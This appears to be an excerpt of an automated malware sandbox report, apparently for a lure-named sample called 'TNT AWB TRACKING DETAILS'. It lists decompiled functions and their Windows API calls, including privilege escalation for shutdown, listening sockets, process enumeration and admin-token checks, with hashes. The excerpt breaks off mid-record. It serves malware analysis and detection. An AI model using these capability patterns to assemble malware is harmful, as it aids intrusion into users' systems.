Part of subcall function 00AF87E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00AF882B
Part of subcall function 00AF87E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00AF8858
Part of subcall function 00AF87E1: GetLastError.KERNEL32 ref: 00AF8865

ExitWindowsEx.USER32(?,00000000), ref: 00B051F9

Strings

@, xrefs: 00B051EC
SeShutdownPrivilege, xrefs: 00B051C9
, xrefs: 00B051E7

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $@$SeShutdownPrivilege
API String ID: 2234035333-194228
Opcode ID: 8220eee48974886f81753f58b55876f61cbc402b4b3ccf672a6b950d7005d401
Instruction ID: 9e5d168a7e362d7b3b65adda89d460369c1a01ec8390f6d03eb345b095047bb7
Opcode Fuzzy Hash: 8220eee48974886f81753f58b55876f61cbc402b4b3ccf672a6b950d7005d401
Instruction Fuzzy Hash: 7C012B35791616ABF73866689C8AFBBBAE8EF05740F2005F1F903E28D2DD515C418DA0

Function 00B16283 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00B162DC
WSAGetLastError.WSOCK32(00000000), ref: 00B162EB
bind.WSOCK32(00000000,?,00000010), ref: 00B16307
listen.WSOCK32(00000000,00000005), ref: 00B16316
WSAGetLastError.WSOCK32(00000000), ref: 00B16330
closesocket.WSOCK32(00000000,00000000), ref: 00B16344

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: ErrorLast$bindclosesocketlistensocket
String ID:
API String ID: 1279440585-0
Opcode ID: ccf71469c1b58a83c9cd1985d6dcbd29bd6abfbead69d17c59917d2effee072d
Instruction ID: e95952d92ea043b9a709344b7ae774b73d8314a96f49d9dfc63dc61b7d963c4c
Opcode Fuzzy Hash: ccf71469c1b58a83c9cd1985d6dcbd29bd6abfbead69d17c59917d2effee072d
Instruction Fuzzy Hash: 6A2191316002059FCB10EF68D945B7EB7F9EF49720F5442A9F926A72E1CB70AD41CB61

Function 00AB5520 Relevance: 8.0, APIs: 5, Instructions: 516COMMON

Download Yara Rule

APIs

Part of subcall function 00AC0DB6: std::exception::exception.LIBCMT ref: 00AC0DEC
Part of subcall function 00AC0DB6: __CxxThrowException@8.LIBCMT ref: 00AC0E01

_memmove.LIBCMT ref: 00AF0258
_memmove.LIBCMT ref: 00AF036D
_memmove.LIBCMT ref: 00AF0414

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: _memmove$Exception@8Throwstd::exception::exception
String ID:
API String ID: 1300846289-0
Opcode ID: 0a91f7e158a863fecb25678b703c2db82d5600fad5adcf1d2002feee3b346ec0
Instruction ID: 64697ae5ce9d8af1693e7eae6b3c50f73243c36dc4f8bcff0b301e2dbc0aa747
Opcode Fuzzy Hash: 0a91f7e158a863fecb25678b703c2db82d5600fad5adcf1d2002feee3b346ec0
Instruction Fuzzy Hash: 76028E70A00209DFCF14DFA4D991ABEBBB9EF44300F1580A9F906DB296EB35D954CB91

Function 00AA1287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON

Download Yara Rule

APIs

Part of subcall function 00AA2612: GetWindowLongW.USER32(?,000000EB), ref: 00AA2623

DefDlgProcW.USER32(?,?,?,?,?), ref: 00AA19FA
GetSysColor.USER32(0000000F), ref: 00AA1A4E
SetBkColor.GDI32(?,00000000), ref: 00AA1A61

Part of subcall function 00AA1290: DefDlgProcW.USER32(?,00000020,?), ref: 00AA12D8

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: ColorProc$LongWindow
String ID:
API String ID: 3744519093-0
Opcode ID: cac55550220f2273d06d9720e8b3aadf70189d94eeed7100c94b10d4e4c7a0e1
Instruction ID: 86ec596a5a941c94e8c30e551d78a0528cdc811c549b32cdcc3429d5826e2c20
Opcode Fuzzy Hash: cac55550220f2273d06d9720e8b3aadf70189d94eeed7100c94b10d4e4c7a0e1
Instruction Fuzzy Hash: 76A12471116594FEE638AB289D58EBF3AADDB433C1F15021AF503D72D2CB249D01D2B2

Function 00B0BCBC Relevance: 7.6, APIs: 5, Instructions: 143fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00B0BCE6
_wcscmp.LIBCMT ref: 00B0BD16
_wcscmp.LIBCMT ref: 00B0BD2B
FindNextFileW.KERNEL32(00000000,?), ref: 00B0BD3C
FindClose.KERNEL32(00000000,00000001,00000000), ref: 00B0BD6C

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNext
String ID:
API String ID: 2387731787-0
Opcode ID: 2fd3b7f1097789e90dd2634fc85ee39481bf9d356f338a53d0e0b34a8faaa316
Instruction ID: 16baf6a86d64da674a1a9be3bc87538c700c128a18960d67f1823dc869f94e69
Opcode Fuzzy Hash: 2fd3b7f1097789e90dd2634fc85ee39481bf9d356f338a53d0e0b34a8faaa316
Instruction Fuzzy Hash: A7516B356046029FD714DF68C590EAAF7E8EF4A320F1046ADF966873A1DB30ED05CB91

Function 00B16747 Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00B17D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00B17DB6

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00B1679E
WSAGetLastError.WSOCK32(00000000), ref: 00B167C7
bind.WSOCK32(00000000,?,00000010), ref: 00B16800
WSAGetLastError.WSOCK32(00000000), ref: 00B1680D
closesocket.WSOCK32(00000000,00000000), ref: 00B16821

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: ErrorLast$bindclosesocketinet_addrsocket
String ID:
API String ID: 99427753-0
Opcode ID: bfd5779fe8c95672bb392fcd7a0349aaae686693b7b856a784aea15c053271bc
Instruction ID: 70b1ba0ac398903edc42b575a65103a98d11f3ca79a403891638e9532c09ac28
Opcode Fuzzy Hash: bfd5779fe8c95672bb392fcd7a0349aaae686693b7b856a784aea15c053271bc
Instruction Fuzzy Hash: 9C41BF75A00210AFEB10AF64CD86F7E77E8DB0AB14F44856CFA15AB3D2CB789D018791

Function 00B25376 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 00B253C5
IsWindowEnabled.USER32 ref: 00B253D3
GetForegroundWindow.USER32(?,?,00000001), ref: 00B253E0
IsIconic.USER32 ref: 00B253EE
IsZoomed.USER32 ref: 00B253FC

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: 326932e70d6b647869d06e32ce7d40b34cd50fb860d9d521e65b1f18f42b5ce7
Instruction ID: a74fbfbbb0b0275007af6b05de176ad96a74a37d3526cf71cd90323301111169
Opcode Fuzzy Hash: 326932e70d6b647869d06e32ce7d40b34cd50fb860d9d521e65b1f18f42b5ce7
Instruction Fuzzy Hash: AB1186317005215BDB31AF26AC44A6ABBE9EF457A1B404479F84AD7251CB74DD0286A4

Function 00AF80A9 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00AF80C0
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00AF80CA
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00AF80D9
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00AF80E0
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00AF80F6

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: f9a3932ee3b742868a0c5f48290fcee713b6f50792b86aef89c9daf342aa116c
Instruction ID: 78bc59b8657843e2f7741b979573ff2b6f02acde900e9b2460318639d1e40ed7
Opcode Fuzzy Hash: f9a3932ee3b742868a0c5f48290fcee713b6f50792b86aef89c9daf342aa116c
Instruction Fuzzy Hash: BCF04F31240209AFEB204FA5EC8DE773BBCEF49755B400235FA45D7150CF659C42DA64

Function 00AA4B37 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00AA4AD0), ref: 00AA4B45
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00AA4B57

Strings

kernel32.dll, xrefs: 00AA4B40
GetNativeSystemInfo, xrefs: 00AA4B51

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 2574300362-192647395
Opcode ID: 317f758773bff1ccdabd149d9ae38a5a53cb630fb37be75f72991228568fc0f3
Instruction ID: 21e11d51a93ee1d084ca4b3dc3e1b6bf6dd70ab8708976ff0573d6025fe8a43d
Opcode Fuzzy Hash: 317f758773bff1ccdabd149d9ae38a5a53cb630fb37be75f72991228568fc0f3
Instruction Fuzzy Hash: 2AD01234A10723CFD7209F31E858B56B6F4AF49751B11887DA485D71A0DBB0D480C664

Function 00AB3030 Relevance: 6.6, APIs: 4, Instructions: 587COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: __itow__swprintf
String ID:
API String ID: 674341424-0
Opcode ID: 738c5d6d95a0c4cfc9e132028d725463dfd231e6fd9ddeecb44d43a6233992a7
Instruction ID: 1810dc66ca349cb658dcfde62bc3d9f40c59db2889e0686c2db299412bbe523a
Opcode Fuzzy Hash: 738c5d6d95a0c4cfc9e132028d725463dfd231e6fd9ddeecb44d43a6233992a7
Instruction Fuzzy Hash: B2229E726083409FDB24DF24C981BAFB7E8BF95350F14492DF49A97292DB71E904CB92

Function 00B1EE0D Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00B1EE3D
Process32FirstW.KERNEL32(00000000,?), ref: 00B1EE4B

Part of subcall function 00AA7DE1: _memmove.LIBCMT ref: 00AA7E22

Process32NextW.KERNEL32(00000000,?), ref: 00B1EF0B
CloseHandle.KERNEL32(00000000,?,?,?), ref: 00B1EF1A

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
String ID:
API String ID: 2576544623-0
Opcode ID: b907a198684ea5a1e01a55a3e6e8cf9e444cd45939ad93e94732125240e58386
Instruction ID: 3ed61070a2f81196cc46d53db6161768d15f6bac5ec284648531971ba8a0708e
Opcode Fuzzy Hash: b907a198684ea5a1e01a55a3e6e8cf9e444cd45939ad93e94732125240e58386
Instruction Fuzzy Hash: B45170715043019FD360EF24DC81EABB7E8EF99710F50492DF995972A1EB70E909CB92

Function 00AFE616 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 00AFE628

Strings

|, xrefs: 00AFE658
(, xrefs: 00AFE66E

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: lstrlen
String ID: ($|
API String ID: 1659193697-1631851259
Opcode ID: 787f395c81302d8431c0f7f52fb12f0a1fbe87c73efcb8a0b2652dee83a556e9
Instruction ID: f5f7fcdf1562d9aeb5b69ef0e2fbb4e6640609fc42d29d11d27a4bbbd88fde58
Opcode Fuzzy Hash: 787f395c81302d8431c0f7f52fb12f0a1fbe87c73efcb8a0b2652dee83a556e9
Instruction Fuzzy Hash: E4322575A007099FDB28DF59C481A6AB7F1FF48320B15C46EE99ADB3A1E770E941CB40

Function 00B122EE Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00B1180A,00000000), ref: 00B123E1
InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00B12418

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: Internet$AvailableDataFileQueryRead
String ID:
API String ID: 599397726-0
Opcode ID: f7e0f2cf7815642ab9df3ecd79230c5d614ce14aa536455ab01696c429cb450c
Instruction ID: 9791016d5aeedbdb909ddbd94470481e229ade8d463e3b66e78e2db776e84834
Opcode Fuzzy Hash: f7e0f2cf7815642ab9df3ecd79230c5d614ce14aa536455ab01696c429cb450c
Instruction Fuzzy Hash: E641C371A04209BFEB209F95EC85FFBB7FCEB40314F5040AEF611A7240EA759E919664

Function 00B0B3FB Relevance: 4.6, APIs: 3, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00B0B40B
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00B0B465
SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00B0B4B2

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: 272e5d325aab3e6aed36f0009631e75b4a4a398218a4b98b0b39d55b6d50b4ff
Instruction ID: ccd71041c166f39ebd044cd44ba1f04c748494dd5781b9f3a535f952806ccf8d
Opcode Fuzzy Hash: 272e5d325aab3e6aed36f0009631e75b4a4a398218a4b98b0b39d55b6d50b4ff
Instruction Fuzzy Hash: 8F216035A00108EFCB00EFA5D985EEEBBF8FF49310F1480A9E905AB391CB359916CB50

Function 00AF87E1 Relevance: 4.6, APIs: 3, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00AC0DB6: std::exception::exception.LIBCMT ref: 00AC0DEC
Part of subcall function 00AC0DB6: __CxxThrowException@8.LIBCMT ref: 00AC0E01

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00AF882B
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00AF8858
GetLastError.KERNEL32 ref: 00AF8865

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
String ID:
API String ID: 1922334811-0
Opcode ID: 9ff533f631614f9d1ed8bddafa3f8c364d0579aae6a613e272bf229844de25e7
Instruction ID: 0017ba48a315357e0cd97cb3f02c3458a98406357c30b3aaa2f8767688e96e5e
Opcode Fuzzy Hash: 9ff533f631614f9d1ed8bddafa3f8c364d0579aae6a613e272bf229844de25e7
Instruction Fuzzy Hash: 5B116DB2814209AFE728DFA4DC85D7BB7BCEB44750B20852EF45697241EA34AC418B60

Function 00AF874B Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00AF8774
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00AF878B
FreeSid.ADVAPI32(?), ref: 00AF879B

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: 1d79b45340708588b3331c426fc4fdbb704c9644efea7fc584aed98232f5c315
Instruction ID: 3e5a282819092c157882d17663d8703958e0233dda0936f6f8ba1872c608e457
Opcode Fuzzy Hash: 1d79b45340708588b3331c426fc4fdbb704c9644efea7fc584aed98232f5c315
Instruction Fuzzy Hash: 59F03775A1120DBBDB00DFE49D89ABEBBB8EF08201F1044A9AA01E2181EA756A048B50

Function 00B0C6D1 Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00B0C6FB
FindClose.KERNEL32(00000000), ref: 00B0C72B

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 76012b7c67e4f7ee36dea96526aa9579dceebbd8144539ee5fecea471745f47b
Instruction ID: 04d9b5828ae2cd78383590b2cada081001b17edba8c26761a7937048dabf84b2
Opcode Fuzzy Hash: 76012b7c67e4f7ee36dea96526aa9579dceebbd8144539ee5fecea471745f47b
Instruction Fuzzy Hash: DE11A1726002049FDB10DF29C885A2AFBE9FF89320F00861DF9A9D7290DB34AC01CF81

Function 00B0A06A Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00B19468,?,00B2FB84,?), ref: 00B0A097
FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00B19468,?,00B2FB84,?), ref: 00B0A0A9

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
